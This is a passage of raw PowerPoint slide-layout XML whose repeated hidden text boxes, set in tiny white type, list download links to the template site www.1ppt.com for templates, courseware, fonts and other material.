              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout115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15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15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15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1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16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16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16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16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16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16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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout116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16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16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16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1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17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17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17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17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17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17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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout117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17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17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17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1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18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18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18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18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18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18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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
